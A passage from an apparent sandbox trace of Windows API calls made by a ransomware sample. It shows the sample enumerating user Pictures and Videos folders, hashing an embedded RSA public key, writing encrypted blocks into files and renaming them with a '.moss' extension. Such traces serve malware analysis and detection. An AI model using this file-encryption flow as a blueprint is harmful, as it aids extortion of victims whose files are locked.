lpNumberOfBytesRead=0x401fb70*=0xa63f, lpOverlapped=0x0) returned 1 [0172.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.832] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.832] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.832] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0172.833] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.833] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.833] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.833] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.833] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.833] GetLastError () returned 0x0 [0172.834] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.834] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0172.834] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.834] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.834] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.834] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.834] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.834] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.835] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xa63f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.835] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.835] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\R9-vmE0.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\r9-vme0.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\R9-vmE0.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\r9-vme0.bmp.moss")) returned 1 [0172.837] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\RY8z5ggN.gif") returned=".gif" [0172.837] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\RY8z5ggN.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\ry8z5ggn.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.837] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=69223) returned 1 [0172.837] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.841] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10e41, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.841] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.842] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.842] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x10e67, lpOverlapped=0x0) returned 1 [0172.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.843] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.843] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0172.844] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.844] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.844] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.844] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.844] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.844] GetLastError () returned 0x0 [0172.844] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.844] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0172.845] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.845] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.845] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.845] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.845] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.845] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.846] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10e67, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.846] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.846] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\RY8z5ggN.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\ry8z5ggn.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\RY8z5ggN.gif.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\ry8z5ggn.gif.moss")) returned 1 [0172.848] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.849] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.849] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45e88 [0172.849] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.849] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46080 [0172.849] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.849] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\") returned="wchwPGABs3kExE1F\\" [0172.849] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.849] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed88 [0172.849] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\") returned="Uzo_bgWg\\" [0172.849] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0172.849] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed88 | out: hHeap=0xcd0000) returned 1 [0172.849] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\") returned="V4xTSO7L1q6Ip\\" [0172.849] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.849] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0172.849] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0172.849] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b578d0 [0172.849] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0172.849] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.849] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.849] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b578d0 | out: hHeap=0xcd0000) returned 1 [0172.850] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.850] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.850] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.850] PathFindFileNameW (pszPath="") returned="" [0172.850] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46080 [0172.850] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd3d3010, ftCreationTime.dwHighDateTime=0x1d5db53, ftLastAccessTime.dwLowDateTime=0xc3386f20, ftLastAccessTime.dwHighDateTime=0x1d5dc8e, ftLastWriteTime.dwLowDateTime=0xc3386f20, ftLastWriteTime.dwHighDateTime=0x1d5dc8e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.850] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46080 | out: hHeap=0xcd0000) returned 1 [0172.850] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd3d3010, ftCreationTime.dwHighDateTime=0x1d5db53, ftLastAccessTime.dwLowDateTime=0xc3386f20, ftLastAccessTime.dwHighDateTime=0x1d5dc8e, ftLastWriteTime.dwLowDateTime=0xc3386f20, ftLastWriteTime.dwHighDateTime=0x1d5dc8e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.850] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a0f64f0, ftCreationTime.dwHighDateTime=0x1d5ddc6, ftLastAccessTime.dwLowDateTime=0xd4beaa0, ftLastAccessTime.dwHighDateTime=0x1d5e7df, ftLastWriteTime.dwLowDateTime=0xd4beaa0, ftLastWriteTime.dwHighDateTime=0x1d5e7df, nFileSizeHigh=0x0, nFileSizeLow=0x9b4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="33BvA-jKWXb.swf", cAlternateFileName="33BVA-~1.SWF")) returned 1 [0172.850] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46080 [0172.850] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xee) returned 0x35ceae8 [0172.850] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46080 | out: hHeap=0xcd0000) returned 1 [0172.850] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\33BvA-jKWXb.swf") returned=".swf" [0172.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\33BvA-jKWXb.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\33bva-jkwxb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.850] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=39757) returned 1 [0172.851] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.854] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x9b27, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.854] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.855] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.855] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.855] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.856] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x9b4d, lpOverlapped=0x0) returned 1 [0172.856] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.856] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.856] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.856] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.856] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0172.857] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.857] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.857] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.857] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.857] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.857] GetLastError () returned 0x0 [0172.858] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.858] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0172.858] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.858] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.858] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.858] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.858] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.858] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.858] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.858] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9b50) returned 0x3b62d40 [0172.858] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0172.858] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0172.858] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0172.858] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.858] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b48820 [0172.858] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0172.858] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b578d0 [0172.858] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e730 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57918 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e748 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e778 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e790 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0172.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0172.859] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.859] RtlAllocateHeap 